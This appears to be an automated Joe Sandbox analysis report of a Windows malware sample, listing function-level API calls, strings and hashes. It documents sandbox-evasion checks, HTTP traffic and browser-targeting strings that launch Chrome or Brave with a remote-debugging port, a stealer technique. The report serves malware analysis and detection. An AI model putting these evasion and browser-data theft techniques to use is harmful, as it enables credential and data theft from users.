Instruction ID: 56630df3f9a1121e358c86d43682af9e85f8bbcd47ea8763ba8f74f533c9f43c
Opcode Fuzzy Hash: 39db56893d369c74f5f4f3db1860a6a0fb8aa9103e681a18a70390936e9ddc23
Instruction Fuzzy Hash: 8541B6B1D05358DBDB10DF94CC45BDEBBB8AF48704F10009AF509A7280D7786B84CBA9

Function 023F003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 023F024D

Strings

kernel32.dll, xrefs: 023F008F, 023F0095
cess, xrefs: 023F018D

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: c9e143a7132afb2d700f33134137a80c5e2cb26c854c436d9f01d94a242f29a0
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 36526B74A01229DFDBA4CF58D984BACBBB5BF09304F1480D9E54DAB356DB30AA85CF14

Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C0B0), ref: 00419BF1
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C140), ref: 00419C0A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C158), ref: 00419C22
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C470), ref: 00419C3A
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C3E0), ref: 00419C53
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A66718), ref: 00419C6B
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A654C0), ref: 00419C83
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A65320), ref: 00419C9C
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C4D0), ref: 00419CB4
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C5A8), ref: 00419CCC
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C5D8), ref: 00419CE5
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C5C0), ref: 00419CFD
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A65400), ref: 00419D15
Part of subcall function 00419BB0: GetProcAddress.KERNEL32(74DD0000,00A6C5F0), ref: 00419D2E

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211

Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E

Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143

Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294

Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14

GetUserDefaultLCID.KERNEL32 ref: 00416CC6

Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A6DD90,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,00A6DD90,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 3511611419-0
Opcode ID: bf967cd6bc2304dd4ffbf75b22ae3b16d4045f6df65640dcb8cb66761ee7e8e8
Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
Opcode Fuzzy Hash: bf967cd6bc2304dd4ffbf75b22ae3b16d4045f6df65640dcb8cb66761ee7e8e8
Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E

Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60
stringnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Strings

<, xrefs: 00404819

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ??2@$CrackInternetlstrlen
String ID: <
API String ID: 1683549937-4251816714
Opcode ID: 0d04d0fb4be0be433e1c114cda58dd540d8fffc3d57bbae13facacbf9f3574dd
Instruction ID: 160db8237089610cf3963e488d7c28046b69bb3d6c402c1973a99714a059ae02
Opcode Fuzzy Hash: 0d04d0fb4be0be433e1c114cda58dd540d8fffc3d57bbae13facacbf9f3574dd
Instruction Fuzzy Hash: 9F2149B1D00219ABDF14DFA5EC4AADD7B75FF04320F008229F925A7290EB706A19CF95

Function 00401220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
__aulldiv.LIBCMT ref: 00401258
__aulldiv.LIBCMT ref: 00401266
ExitProcess.KERNEL32 ref: 00401294

Strings

@, xrefs: 00401233

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: __aulldiv$ExitGlobalMemoryProcessStatus
String ID: @
API String ID: 3404098578-2766056989
Opcode ID: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction ID: 198c605b63268064c6e3321c907f2861ebf30c0b4d659eb8408d118d522d9ff8
Opcode Fuzzy Hash: 878a90f34e096d30e7d89448c69a574e23fa6b892c1598a4a852eafceae412f3
Instruction Fuzzy Hash: 88014BF0D44308BAEB10DFE0DD4ABAEBB78AB14705F20849EE604B62D0D6785581875D

Function 00416D93 Relevance: 6.0, APIs: 4, Instructions: 30
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00A6DD90,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
CloseHandle.KERNEL32(00000000), ref: 00416D99
Sleep.KERNEL32(00001770), ref: 00416DA4
CloseHandle.KERNEL32(?,00000000,?,00A6DD90,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
ExitProcess.KERNEL32 ref: 00416DC2

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CloseEventHandle$CreateExitOpenProcessSleep
String ID:
API String ID: 941982115-0
Opcode ID: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction ID: 8f12dcb365d2fb80f233d5f720f30c8ba2b1eb9bf2b810d0bdce41a90926edfe
Opcode Fuzzy Hash: d5e1fa89fe7d5108738a6f3c91913c7127e375a878f495bce87c5ec22f141b40
Instruction Fuzzy Hash: 46F08230B48219EFEB00BBA0EC0ABFE7375AF04705F15061BB516A51D0DBB89681CA5B

Function 00415440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 004062D0: InternetOpenA.WININET(00420DFF,00000001,00000000,00000000,00000000), ref: 00406331
Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,00A72600), ref: 00406353
Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,00A72080,00000000,00000000,00400100,00000000), ref: 004063D5
Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421

StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00415478

Strings

ERROR, xrefs: 004154C3
ERROR, xrefs: 0041546A

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
String ID: ERROR$ERROR
API String ID: 3287882509-2579291623
Opcode ID: 0b85306fa1b01ee954ad4d11778b61a05f546c7aa1c90cc696e090c0594c38db
Instruction ID: 220a7b172e2a8d17d187597bbcd3bb12c7c2fc56be07e285a6b23909b802432f
Opcode Fuzzy Hash: 0b85306fa1b01ee954ad4d11778b61a05f546c7aa1c90cc696e090c0594c38db
Instruction Fuzzy Hash: 6E118630A01048ABCB14FF65EC52EED33399F50354F40456EF90A5B4A2EF38AB95C65E

Function 00417A70 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction ID: 80df14e24d55d9e77394b8c0389cbc6422d62e125eda11eaf6ba37d1415b345b
Opcode Fuzzy Hash: bd395e3c10b2e9752f846d4f55ec5ddb2c88ed80ced139acaed9e3128f7bbde2
Instruction Fuzzy Hash: D60181B1E08359ABC700CF98DD45BAFBBB8FB04751F10021BF505E2280E7B85A408BA2

Function 00401110 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
ExitProcess.KERNEL32 ref: 00401143

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction ID: f86d798d442288df0e099431c712f1cdbed5da6d4770a056b1c254158006f616
Opcode Fuzzy Hash: 11ea4e03c837496306c88658afd9ed440fb44e3d5b70bdcdd02673fa8ef340ef
Instruction Fuzzy Hash: DCE0E670D8A30CFBE7105BA19D0AB4D77689B04B15F101156F709BA5D0D6B92640565D

Function 008607A6 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008607CE
Module32First.KERNEL32(00000000,00000224), ref: 008607EE

Memory Dump Source

Source File: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 91f075e3fe246ac63cdfe157f16941882a1f32e7eeee10cdca2aae8c13d21d85
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: 98F0CD322003146FE7203AB9A88CB6F77E8FF49725F110528E642D10C0DAB1F8058E69

Function 023F0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,023F0223,?,?), ref: 023F0E19
SetErrorMode.KERNEL32(00000000,?,?,023F0223,?,?), ref: 023F0E1E

Memory Dump Source

Source File: 00000000.00000002.1921333009.00000000023F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 023F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_23f0000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: bbf28fa88db598cca1416b83849b6c0c41f696e2e09afd48b7263ebf89176091
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: ABD01231545128B7D7402A94DC09BCD7B1CDF05B66F008011FB0DD9081C770954046E5

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 7bfc07f09de9d23e0312477979ea6e59813f197233deaee74b0ee56a993e5f13
Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
Opcode Fuzzy Hash: 7bfc07f09de9d23e0312477979ea6e59813f197233deaee74b0ee56a993e5f13
Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF

Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169

Function 00860465 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 008604B6

Memory Dump Source

Source File: 00000000.00000002.1920917794.0000000000860000.00000040.00001000.00020000.00000000.sdmp, Offset: 00860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 3e51eb2a7bce31b8bbdd634a2ce22675ed4330a1049b3906e63248d153c771b6
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 2C113C79A40208EFDB01DF98C985E99BBF5EF08350F058094FA489B362D771EA90DF84

Non-executed Functions

Function 0040BE40 Relevance: 63.7, APIs: 29, Strings: 7, Instructions: 727fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2F,00000000,?,?,?,00421450,00420B2E), ref: 0040BEC5
StrCmpCA.SHLWAPI(?,00421454), ref: 0040BF33
StrCmpCA.SHLWAPI(?,00421458), ref: 0040BF49
FindNextFileA.KERNEL32(000000FF,?), ref: 0040C8A9
FindClose.KERNEL32(000000FF), ref: 0040C8BB

Strings

--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C3B2
Brave, xrefs: 0040C0E8
Google Chrome, xrefs: 0040C6F8
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C495
Preferences, xrefs: 0040C104
--remote-debugging-port=9229 --profile-directory=", xrefs: 0040C534
\Brave\Preferences, xrefs: 0040C1C1

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-1869280968
Opcode ID: 941a693946549d8fdc195eacd1cfccc712cd3b7b2a62cbaad3fe546b67871098
Instruction ID: 94c18d54b217f3a33de79012ae3cbc39d408ee074d55138b38aa149d1ce8c153
Opcode Fuzzy Hash: 941a693946549d8fdc195eacd1cfccc712cd3b7b2a62cbaad3fe546b67871098
Instruction Fuzzy Hash: 5C52A871A011049BCB14FB61DC96EEE733DAF54304F4045AEF50A66091EF386B98CFAA

Function 00413B00 Relevance: 47.5, APIs: 21, Strings: 6, Instructions: 250filestringCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00413B1C
FindFirstFileA.KERNEL32(?,?), ref: 00413B33
lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
FindClose.KERNEL32(000000FF), ref: 00413ECC

Strings

%s%s, xrefs: 00413CFD
%s\%s, xrefs: 00413CBF
%s\*, xrefs: 00413B10
q?A, xrefs: 00413ED2, 00413E95, 00413DB9, 00413B59, 00413DBC, 00413E98
%s\%s\%s, xrefs: 00413C9A
%s\%s, xrefs: 00413BCA

Memory Dump Source

Source File: 00000000.00000002.1920616957.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1920616957.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1920616957.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_8WOUWb5iEv.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextlstrcatwsprintf
